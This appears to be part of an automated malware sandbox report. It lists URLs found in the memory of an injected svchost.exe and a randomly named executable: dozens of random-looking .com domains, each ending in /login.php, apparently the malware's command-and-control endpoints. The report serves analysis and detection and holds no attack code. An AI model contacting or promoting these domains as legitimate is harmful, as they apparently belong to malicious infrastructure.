Source: svchost.exe, 00000002.00000003.2763334143.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403450959.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3265760525.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2787365873.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2764486074.00000000086F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyvyw.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3401901735.0000000008633000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433469264.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430808473.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548643584.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527269285.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2541435217.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302596386.000000000865D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ganyzub.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329748670.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqycyz.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157288878.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2155150601.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152199201.000000000338F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157083075.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151945828.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2733416103.00000000096C4000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2670340730.0000000009356000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2767328417.0000000008768000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000658000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.00000000083D7000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2754881152.000000000843D000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2711620441.0000000008C6C000.00000004.00000001.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2746386835.0000000008E05000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://gaqydeb.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329628428.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330446877.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334181353.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334382414.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqydus.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqyfah.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqyhuz.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqykus.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2747671428.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqynih.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337099007.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610102916.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqypew.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393602354.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2280606997.0000000000882000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqypiz.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqyqez.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303458885.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307211585.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2554924248.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298813609.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqyqis.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2799115351.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqyres.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqyvob.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433469264.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430808473.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548643584.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527269285.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2541435217.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gaqyzuw.com/login.php
Source: svchost.exe, 00000002.00000003.2772293102.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2783207555.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772917622.00000000033AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatycis.com/http://ganyrew.com/http://pupycop.com/http://gatycis.com/
Source: svchost.exe, 00000002.00000003.2434703123.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557475743.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577719348.0000000008784000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272090324.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404003407.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548810720.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578793071.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatycoh.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337435190.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335316915.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatycyb.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2772865274.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2805126129.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2769955415.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771520849.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatydab.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyfaz.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408310468.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153845839.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157288878.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2396706488.00000000086F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408240997.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157020892.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397272204.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151605214.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2395827509.00000000086EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394995795.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152200523.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151945828.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2157370436.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3266427470.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2408435581.0000000008706000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.000000000165E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gatyfus.com/login.php
